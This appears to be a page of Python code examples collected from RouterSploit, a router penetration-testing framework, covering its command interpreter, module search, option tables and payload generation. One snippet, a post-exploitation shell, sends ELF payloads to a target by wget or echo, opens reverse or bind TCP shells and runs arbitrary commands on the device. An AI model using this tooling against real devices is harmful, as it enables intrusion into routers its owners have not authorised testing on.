예제 #1
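    def loadAutoScript(self):
        """Replay the commands stored in ``autoTmpScript.rc``.

        Each line is stripped and echoed with ``print_status``; blank lines
        and lines starting with ``#`` are skipped. Every other line is parsed
        with ``self.parse_line`` and dispatched through
        ``self.get_command_handler``, exactly like a line typed at the prompt.

        NOTE(review): the file name is relative, so it is resolved against
        the directory the process was started from, and its lines run
        without confirmation. Treat the file as trusted input only.
        """
        try:
            script = open("autoTmpScript.rc", 'r')    # automate file
        except (IOError, OSError):
            # Only a failed open means "no script"; a bare except here would
            # also swallow KeyboardInterrupt and programming errors.
            print_status('Don\'t have autoTmpScript.rc')
            return

        # The context manager closes the handle even if a handler raises.
        with script:
            for mycommand in script:
                mycommand = mycommand.strip()

                print_status('%s' % (mycommand))
                if not mycommand or mycommand.startswith('#'):
                    continue
                try:
                    command, args = self.parse_line(mycommand)
                    if not command:
                        continue
                    command_handler = self.get_command_handler(command)
                    command_handler(args)
                except RoutersploitException as err:
                    print_error(err)
                except EOFError:
                    print_info()
                    print_status("routersploit stopped")
                    break
                except KeyboardInterrupt:
                    print_info()
                finally:
                    # Flush queued output before handling the next line.
                    printer_queue.join()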
예제 #2
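    def __handle_if_noninteractive(self, argv):
        """Run one module straight from the command line when ``-x`` is given.

        Recognised options: ``-h`` (print usage, exit 0), ``-x`` (run
        non-interactively), ``-m/--module <module>`` and ``-s/--set
        "<option> <value>"`` (may be repeated). Without ``-x`` the method
        returns and the caller carries on. With ``-x`` it selects the
        module, applies every ``--set`` in order, runs the exploit command
        and exits the process with status 0.

        An option parsing error, or ``-x`` without a module, prints the
        usage line and exits with status 2.
        """
        noninteractive = False
        module = ""
        set_opts = []

        try:
            opts, _ = getopt.getopt(argv, "hxm:s:", ["module=", "set="])
        except getopt.GetoptError:
            print_info("{} -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
            sys.exit(2)

        for opt, arg in opts:
            if opt == "-h":
                print_info("{} -x -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
                sys.exit(0)
            elif opt == "-x":
                noninteractive = True
            elif opt in ("-m", "--module"):
                module = arg
            elif opt in ("-s", "--set"):
                set_opts.append(arg)

        if not noninteractive:
            return

        if not module:
            # Without a module there is nothing to select; fail with a
            # non-zero status instead of running the remaining commands
            # against an empty module name and exiting 0.
            print_info("{} -x -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
            sys.exit(2)

        self.command_use(module)

        for opt in set_opts:
            self.command_set(opt)

        self.command_exploit()

        sys.exit(0)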
예제 #3
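    def run(self):
        """Generate the payload and emit it in the format named by ``self.output``.

        ``"elf"`` writes the built binary to ``self.filepath``; ``"c"`` and
        ``"python"`` print the generated source with ``print_info``. An
        ``OptionValidationError`` raised by ``self.generate()`` is printed
        and the method returns early.

        Raises:
            OptionValidationError: if ``self.output`` is not one of the
                three supported formats.
        """
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            print_status("Building ELF payload")
            content = self.generate_elf(data)
            print_success("Saving file {}".format(self.filepath))
            # Open only once the content exists, so a failed build does not
            # leave a truncated file behind. Write-only access is enough.
            # NOTE(review): an existing file at self.filepath is overwritten.
            with open(self.filepath, 'wb') as f:
                f.write(content)
        elif self.output == "c":
            print_success("Building payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )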
예제 #4
 def _wrapper(self, *args, **kwargs):
     """Return ``[]`` early or delegate to ``wrapped_function``.

     When the second positional argument contains exactly ``space_number``
     spaces, an empty list is returned. Any exception raised while
     inspecting the arguments is printed with ``print_info`` and the call
     is delegated as usual.
     """
     try:
         already_complete = args[1].count(" ") == space_number
     except Exception as err:
         print_info(err)
     else:
         if already_complete:
             return []
     return wrapped_function(self, *args, **kwargs)
예제 #5
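    def run(self):
        """Generate the payload, emit it per ``self.output`` and return it.

        ``"elf"`` writes the built binary to ``self.filepath``; ``"c"`` and
        ``"python"`` print the generated source with ``print_info``. If
        ``self.generate()`` raises ``OptionValidationError`` the error is
        printed and ``None`` is returned.

        Returns:
            The generated content for the selected format.

        Raises:
            OptionValidationError: if ``self.output`` is not one of the
                three supported formats.
        """
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            print_status("Building ELF payload")
            content = self.generate_elf(data)
            print_success("Saving file {}".format(self.filepath))
            # Build first, open second: a failure in generate_elf() must not
            # truncate whatever already exists at the destination path.
            # NOTE(review): an existing file at self.filepath is overwritten.
            with open(self.filepath, "wb") as f:
                f.write(content)
        elif self.output == "c":
            print_success("Building payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )

        return content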
예제 #6
    def __handle_if_noninteractive(self, argv):
        """Handle the ``-x`` non-interactive mode of the command line.

        Parses ``-h``, ``-x``, ``-m/--module`` and ``-s/--set`` from *argv*.
        ``-h`` prints usage and exits 0; a parse error prints usage and
        exits 2. With ``-x`` the module is selected, each ``--set`` value is
        applied in order, the exploit command runs and the process exits 0.
        Without ``-x`` the method simply returns.
        """
        try:
            parsed, args = getopt.getopt(argv, "hxm:s:", ["module=", "set="])
        except getopt.GetoptError:
            print_info("{} -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
            sys.exit(2)

        run_now = False
        module_path = ""
        assignments = []

        for flag, value in parsed:
            if flag == "-h":
                print_info("{} -x -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
                sys.exit(0)
            if flag == "-x":
                run_now = True
            elif flag in ("-m", "--module"):
                module_path = value
            elif flag in ("-s", "--set"):
                assignments.append(value)

        if not run_now:
            return

        self.command_use(module_path)
        for assignment in assignments:
            self.command_set(assignment)
        self.command_exploit()

        sys.exit(0)
예제 #7
 def _wrapper(self, *args, **kwargs):
     """Short-circuit with ``[]`` or fall through to ``wrapped_function``.

     The second positional argument is checked for exactly ``space_number``
     spaces. A failure during that check is reported through
     ``print_info`` and does not prevent the wrapped call.
     """
     suppress = False
     try:
         suppress = args[1].count(" ") == space_number
     except Exception as err:
         print_info(err)
     if suppress:
         return []
     return wrapped_function(self, *args, **kwargs)
예제 #8
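 def command_run(self, *args, **kwargs):
     """Run the currently selected module and report any failure.

     A ``KeyboardInterrupt`` is reported as a user cancellation. Any other
     exception is caught and its traceback printed with ``print_error``,
     so a failing module does not propagate the error to the caller.
     """
     print_status("Running module...")
     try:
         self.current_module.run()
     except KeyboardInterrupt:
         print_info()
         print_error("Operation cancelled by user")
     except Exception:
         # format_exc() picks up the active exception by itself. Its first
         # positional parameter is ``limit``, so passing sys.exc_info()
         # there raises TypeError on Python 3 and hides the real traceback.
         print_error(traceback.format_exc())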
예제 #9
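 def command_run(self, *args, **kwargs):
     """Execute ``self.current_module.run()`` with error reporting.

     ``KeyboardInterrupt`` prints a cancellation message; every other
     exception is turned into a printed traceback instead of propagating.
     """
     print_status("Running module...")
     try:
         self.current_module.run()
     except KeyboardInterrupt:
         print_info()
         print_error("Operation cancelled by user")
     except Exception:
         # The exc_info tuple must not be passed here: format_exc() takes
         # ``limit`` as its first argument and reads the current exception
         # on its own.
         print_error(traceback.format_exc())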
예제 #10
파일: payloads.py 프로젝트: bambeero1/Jail
    def run(self):
        """Generate the payload, optionally encode and format it, then print it.

        ``self.encoder`` and ``self.fmt`` are applied in that order, each
        only when set. The final value is printed with ``print_info`` and
        returned.
        """
        print_status("Generating payload")

        result = self.generate()
        result = self.encoder.encode(result) if self.encoder else result
        result = self.fmt.format(result) if self.fmt else result

        print_info(result)
        return result
예제 #11
    def command_search(self, *args, **kwargs):
        """Print every module path containing the keyword, keyword in red.

        The keyword is the first positional argument. An empty keyword
        prints an error. Matching is done on the raw entry from
        ``self.modules``; highlighting is applied to the path returned by
        ``humanize_path``.
        """
        keyword = args[0]

        if keyword:
            for path in (entry for entry in self.modules if keyword in entry):
                before, hit, after = humanize_path(path).partition(keyword)
                # \033[31m ... \033[0m wraps the matched part in red.
                print_info("{}\033[31m{}\033[0m{}".format(before, hit, after))
            return

        print_error("Please specify search keyword. e.g. 'search cisco'")
예제 #12
    def run(self):
        """Build the payload and return it after optional encoding/formatting.

        The output of ``self.generate()`` is passed through
        ``self.encoder.encode`` and then ``self.fmt.format`` when those
        attributes are truthy. The result is printed and returned.
        """
        print_status("Generating payload")

        generated = self.generate()

        encoded = generated
        if self.encoder:
            encoded = self.encoder.encode(generated)

        formatted = encoded
        if self.fmt:
            formatted = self.fmt.format(encoded)

        print_info(formatted)
        return formatted
예제 #13
    def command_search(self, *args, **kwargs):
        """List modules whose path contains the keyword, highlighting it.

        The first positional argument is the keyword; when it is empty an
        error is printed and nothing is searched.
        """
        keyword = args[0]
        if not keyword:
            print_error("Please specify search keyword. e.g. 'search cisco'")
            return

        # Red for the matched part, reset afterwards.
        template = "{}\033[31m{}\033[0m{}"
        for entry in self.modules:
            if keyword not in entry:
                continue
            readable = humanize_path(entry)
            print_info(template.format(*readable.partition(keyword)))
예제 #14
    def _show_devices(self, *args, **kwargs):  # TODO: cover with tests
        """Print a numbered list of the current module's target devices.

        Devices come from the ``'devices'`` entry of the module's
        ``_Exploit__info__`` mapping. A dict entry is shown by its
        ``'name'`` value, anything else is shown as is. A ``KeyError``
        anywhere in the listing prints the "not defined" message.
        """
        try:
            devices = self.current_module._Exploit__info__['devices']

            print_info("\nTarget devices:")
            for index, device in enumerate(devices):
                label = device['name'] if isinstance(device, dict) else device
                print_info("   {} - {}".format(index, label))
            print_info()
        except KeyError:
            print_info("\nTarget devices are not defined")
예제 #15
    def _show_devices(self, *args, **kwargs):  # TODO: cover with tests
        """Show the target devices declared by the current module.

        Each device is printed with its position in the list. Dict entries
        contribute their ``'name'`` value. If the module metadata has no
        ``'devices'`` key (or a dict entry has no ``'name'``), the
        "not defined" message is printed instead.
        """
        try:
            devices = self.current_module._Exploit__info__['devices']

            print_info("\nTarget devices:")
            position = 0
            for device in devices:
                if not isinstance(device, dict):
                    shown = device
                else:
                    shown = device['name']
                print_info("   {} - {}".format(position, shown))
                position += 1
            print_info()
        except KeyError:
            print_info("\nTarget devices are not defined")
예제 #16
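    def nonInteractive(self, argv):
        """ Execute specific command and return result without launching the interactive CLI

        Parses ``-h/--help``, ``-m/--module <module>`` and
        ``-s/--set "<option> <value>"`` from ``argv[1:]``. A module is
        mandatory. The module is selected, every ``--set`` value is applied
        in order and the exploit command is run. Queued output is flushed
        with ``printer_queue.join()`` before every return.

        :param argv: full argument vector; ``argv[0]`` is used in the usage line
        :return: None
        """
        module = ""
        set_opts = []

        try:
            # "help" takes no value. Declaring it as "help=" made a plain
            # --help fail option parsing instead of reaching the help branch.
            opts, args = getopt.getopt(argv[1:], "hm:s:",
                                       ["help", "module=", "set="])
        except getopt.GetoptError:
            print_info("{} -m <module> -s \"<option> <value>\"".format(
                argv[0]))
            printer_queue.join()
            return

        for opt, arg in opts:
            if opt in ("-h", "--help"):
                print_info("{} -m <module> -s \"<option> <value>\"".format(
                    argv[0]))
                printer_queue.join()
                return
            elif opt in ("-m", "--module"):
                module = arg
            elif opt in ("-s", "--set"):
                set_opts.append(arg)

        if not module:
            print_error('A module is required when running non-interactively')
            printer_queue.join()
            return

        self.command_use(module)

        for opt in set_opts:
            self.command_set(opt)

        self.command_exploit()

        # Wait for results if needed
        printer_queue.join()

        return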
예제 #17
    def start(self):
        """Print the banner and run the interactive command loop.

        Each prompt line is parsed into ``(command, args, kwargs)`` and
        dispatched to the handler returned by ``get_command_handler``.
        ``RoutersploitException`` is printed and the loop continues;
        ``EOFError``, ``KeyboardInterrupt`` or ``SystemExit`` end the loop.
        """
        print_info(self.banner)
        printer_queue.join()
        while True:
            try:
                line = input(self.prompt)
                command, args, kwargs = self.parse_line(line)
                if command:
                    handler = self.get_command_handler(command)
                    handler(args, **kwargs)
            except RoutersploitException as err:
                print_error(err)
            except (EOFError, KeyboardInterrupt, SystemExit):
                print_info()
                print_error("RouterSploit stopped")
                break
            finally:
                # Flush queued output after every iteration, including the last.
                printer_queue.join()
예제 #18
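    def start(self):
        """ Routersploit main entry point. Starting interpreter loop.

        Prints the banner, calls ``self.loadAutoScript()`` once and then
        reads commands from the prompt until ``EOFError``. Every parsed
        command is echoed with ``print_status`` before it is dispatched.
        ``KeyboardInterrupt`` only prints a blank line and the loop
        continues.
        """

        print_info(self.banner)
        printer_queue.join()

        # Run the automation script before handing control to the user.
        # (The unused local ``payloadFile`` that used to sit here is gone.)
        self.loadAutoScript()
        while True:
            try:
                command, args = self.parse_line(input(self.prompt))
                print_status('%s :: %s' % (command, args))

                if not command:
                    continue
                command_handler = self.get_command_handler(command)

                command_handler(args)
            except RoutersploitException as err:
                print_error(err)
            except EOFError:
                print_info()
                print_status("routersploit stopped")
                break
            except KeyboardInterrupt:
                print_info()
            finally:
                printer_queue.join()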
예제 #19
    def _show_options(self, *args, **kwargs):
        """Print the current module's options as two tables.

        Options whose name is one of the well-known connection settings
        go into the "Target options" table, which is always printed. The
        remaining options go into "Module options", printed only when
        there is at least one.
        """
        known_targets = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]

        target_opts = []
        for name in self.current_module.options:
            if name in known_targets:
                target_opts.append(name)

        module_opts = []
        for name in self.current_module.options:
            if name not in target_opts:
                module_opts.append(name)

        headers = ("Name", "Current settings", "Description")

        print_info("\nTarget options:")
        print_table(headers, *self.get_opts(*target_opts))

        if module_opts:
            print_info("\nModule options:")
            print_table(headers, *self.get_opts(*module_opts))

        print_info()
예제 #20
    def _show_options(self, *args, **kwargs):
        """Show target options and, if any exist, module-specific options.

        The split is by name: a fixed list of connection-related option
        names forms the target group, everything else the module group.
        """
        target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
        target_opts = list(
            filter(lambda opt: opt in target_names, self.current_module.options)
        )
        module_opts = list(
            filter(lambda opt: opt not in target_opts, self.current_module.options)
        )
        headers = ("Name", "Current settings", "Description")

        print_info("\nTarget options:")
        target_rows = self.get_opts(*target_opts)
        print_table(headers, *target_rows)

        if module_opts:
            print_info("\nModule options:")
            module_rows = self.get_opts(*module_opts)
            print_table(headers, *module_rows)

        print_info()
예제 #21
    def start(self):
        """Print the banner, then read and dispatch commands until EOF.

        A ``RoutersploitException`` is printed and the loop goes on.
        ``KeyboardInterrupt`` prints a blank line and the loop goes on.
        ``EOFError`` prints the stop message and ends the loop.
        """
        print_info(self.banner)
        printer_queue.join()
        while True:
            try:
                command, args = self.parse_line(input(self.prompt))
                if command:
                    self.get_command_handler(command)(args)
            except RoutersploitException as err:
                print_error(err)
            except EOFError:
                print_info()
                print_status("routersploit stopped")
                break
            except KeyboardInterrupt:
                print_info()
            finally:
                # Runs on every path, including ``break``.
                printer_queue.join()
    def start(self):
        """Interpreter loop: show the banner, then process prompt input.

        Lines are parsed with ``self.parse_line``; a non-empty command is
        handed to its handler. The loop ends on ``EOFError`` only.
        """
        print_info(self.banner)
        printer_queue.join()
        while True:
            try:
                typed = input(self.prompt)
                command, args = self.parse_line(typed)
                if not command:
                    continue
                handler = self.get_command_handler(command)
                handler(args)
            except RoutersploitException as err:
                print_error(err)
            except KeyboardInterrupt:
                print_info()
            except EOFError:
                print_info()
                print_status(" stopped")
                break
            finally:
                printer_queue.join()
예제 #23
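    def command_search(self, *args, **kwargs):
        """Search ``self.modules`` by keyword and optional filters.

        The first positional argument is the keyword string: surrounding
        quotes are stripped, it is lower-cased and split on whitespace,
        and every word must occur in the module path. Keyword arguments
        narrow the search:

        * ``type``    - must be a package directly under ``MODULES_DIR``
        * ``device``  - must be a package under ``exploits``
        * ``language``- must be a package under ``encoders``
        * ``payload`` - must be a package under ``payloads``
        * ``vendor``  - matched as a ``.vendor.`` path segment

        An unknown value for a validated filter prints an error and
        returns. Matches are printed with each keyword word in red.
        """
        import re  # function-scope import keeps this fix self-contained

        mod_type = ''
        mod_detail = ''
        mod_vendor = ''
        existing_modules = [
            name for _, name, _ in pkgutil.iter_modules([MODULES_DIR])
        ]
        devices = [
            name for _, name, _ in pkgutil.iter_modules(
                [os.path.join(MODULES_DIR, 'exploits')])
        ]
        languages = [
            name for _, name, _ in pkgutil.iter_modules(
                [os.path.join(MODULES_DIR, 'encoders')])
        ]
        payloads = [
            name for _, name, _ in pkgutil.iter_modules(
                [os.path.join(MODULES_DIR, 'payloads')])
        ]

        try:
            keyword = args[0].strip("'\"").lower()
        except IndexError:
            keyword = ''

        if not (keyword or kwargs):
            print_error(
                "Please specify at least search keyword. e.g. 'search cisco'")
            print_error(
                "You can specify options. e.g. 'search type=exploits device=routers vendor=linksys WRT100 rce'"
            )
            return

        for (key, value) in kwargs.items():
            if key == 'type':
                if value not in existing_modules:
                    print_error("Unknown module type.")
                    return
                mod_type = "{}.".format(value)
            elif key in ['device', 'language', 'payload']:
                if key == 'device' and (value not in devices):
                    print_error("Unknown exploit type.")
                    return
                elif key == 'language' and (value not in languages):
                    print_error("Unknown encoder language.")
                    return
                elif key == 'payload' and (value not in payloads):
                    print_error("Unknown payload type.")
                    return
                mod_detail = ".{}.".format(value)
            elif key == 'vendor':
                mod_vendor = ".{}.".format(value)

        # Split once instead of once per module.
        words = keyword.split()

        # Highlight in a single pass. Chained str.replace() calls would let
        # a later word (for example "m" or "31") match inside the escape
        # sequences inserted for an earlier word and corrupt the output.
        # Longest alternatives first, so overlapping words prefer the
        # longer match.
        highlighter = None
        if words:
            alternatives = sorted(set(words), key=len, reverse=True)
            highlighter = re.compile(
                "|".join(re.escape(word) for word in alternatives))

        for module in self.modules:
            module_path = str(module)
            if mod_type not in module_path:
                continue
            if mod_detail not in module_path:
                continue
            if mod_vendor not in module_path:
                continue
            if not all(word in module_path for word in words):
                continue

            found = humanize_path(module)

            if highlighter is not None:
                found = highlighter.sub(
                    lambda match: "\033[31m{}\033[0m".format(match.group(0)),
                    found)

            print_info(found)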
예제 #24
 def command_help(self, *args, **kwargs):
     """Print the global help, followed by module help if a module is active."""
     print_info(self.global_help)
     if not self.current_module:
         return
     print_info("\n", self.module_help)
예제 #25
 def __show_modules(self, root=''):
     """Print each module whose dotted path starts with *root*.

     Dots are replaced by the platform path separator for display.
     """
     for dotted in self.modules:
         if not dotted.startswith(root):
             continue
         print_info(dotted.replace('.', os.sep))
예제 #26
 def _show_info(self, *args, **kwargs):
     """Pretty-print the module metadata in a fixed field order."""
     field_order = ("name", "description", "devices", "authors", "references")
     pprint_dict_in_order(self.module_metadata, field_order)
     print_info()
예제 #27
    def start(self, argv):
        """Run a fixed three-command sequence against the target in *argv*.

        The commands are ``use scanners/routers/router_scan``,
        ``set target <argv>`` and ``run``, each parsed and dispatched like
        prompt input. A ``RoutersploitException`` or ``KeyboardInterrupt``
        in one step does not stop the following steps. Returns ``-1`` when
        a line yields no command or on ``EOFError``, otherwise ``None``.

        NOTE(review): *argv* is concatenated into the command line as is;
        callers should pass a single validated target value.
        """
        printer_queue.join()

        # Callables keep each line's construction inside its own try block,
        # so the target string is only built when its step is reached.
        steps = (
            lambda: "use scanners/routers/router_scan",
            lambda: "set target " + argv,
            lambda: "run",
        )

        for build_line in steps:
            try:
                command, args = self.parse_line(build_line())
                if not command:
                    return -1
                handler = self.get_command_handler(command)
                handler(args)
            except RoutersploitException as err:
                print_error(err)
            except EOFError:
                print_info()
                print_status("routersploit stopped")
                return -1
            except KeyboardInterrupt:
                print_info()
            finally:
                printer_queue.join()
예제 #28
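def shell(exploit, architecture="", method="", payloads=None, **params):
    """Interactive ``cmd`` prompt bound to *exploit*.

    When both *architecture* and *method* are given, payload modules are
    loaded from ``routersploit/modules/payloads/<architecture>/``. For
    ``method == "cmd"`` only modules whose ``cmd`` attribute is listed in
    *payloads* are offered.

    Prompt commands:

    * ``quit`` / ``exit``      - leave the prompt
    * ``show payloads``        - table of available payloads
    * ``set payload <name>``   - select a payload and collect its options
    * ``show options``, ``set <option> <value>``, ``run``, ``back``
      - only while a payload is selected
    * anything else            - passed to ``exploit.execute`` and printed

    Args:
        exploit: object providing ``execute`` and ``target``.
        architecture: payload sub-directory name.
        method: one of ``"wget"``, ``"echo"`` or ``"cmd"``.
        payloads: allowed ``cmd`` values when *method* is ``"cmd"``;
            ``None`` is treated as empty.
        **params: forwarded to ``Communication``.

    NOTE(review): *architecture* is interpolated into a filesystem path and
    a dotted import path. Callers should pass only known architecture names.
    """
    available_payloads = {}
    payload = None
    options = []
    # The default is None; membership tests against None would raise.
    allowed_cmds = payloads if payloads is not None else ()

    if architecture and method:
        path = "routersploit/modules/payloads/{}/".format(architecture)

        # get all payloads for given architecture
        all_payloads = [
            f.split(".")[0]
            for f in listdir(path)
            if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"
        ]

        payload_path = path.replace("/", ".")
        for p in all_payloads:
            module = getattr(importlib.import_module("{}{}".format(payload_path, p)), 'Exploit')

            # if method/arch is cmd then filter out payloads
            # Compare by value: ``is`` on a string literal only works when
            # the interpreter happens to intern both strings.
            if method == "cmd":
                if getattr(module, "cmd") in allowed_cmds:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Wait until queued output has been consumed before prompting.
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = [
                (name, cls._Exploit__info__["name"], cls._Exploit__info__["description"])
                for name, cls in available_payloads.items()
            ]

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            c = cmd.split(" ")

            if c[2] in available_payloads:
                payload = available_payloads[c[2]]()

                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                else:
                    # No branch created ``communication``; without this
                    # guard the handler calls below fail on an unbound name.
                    print_error("Unknown method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))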
예제 #29
 def _show_info(self, *args, **kwargs):
     """Print name, description, devices, authors and references of the module."""
     metadata = self.module_metadata
     pprint_dict_in_order(
         metadata,
         ("name", "description", "devices", "authors", "references"),
     )
     print_info()
예제 #30
 def run(self):
     """Generate the payload and print it with ``print_info``."""
     print_status("Generating payload")
     generated = self.generate()
     print_info(generated)
예제 #31
 def __show_modules(self, root=''):
     """List modules under *root*, shown with the OS path separator."""
     matching = filter(lambda name: name.startswith(root), self.modules)
     for name in matching:
         print_info(os.sep.join(name.split('.')))
예제 #32
 def command_help(self, *args, **kwargs):
     """Show global help; append module help while a module is selected."""
     print_info(self.global_help)
     module_selected = bool(self.current_module)
     if module_selected:
         print_info("\n", self.module_help)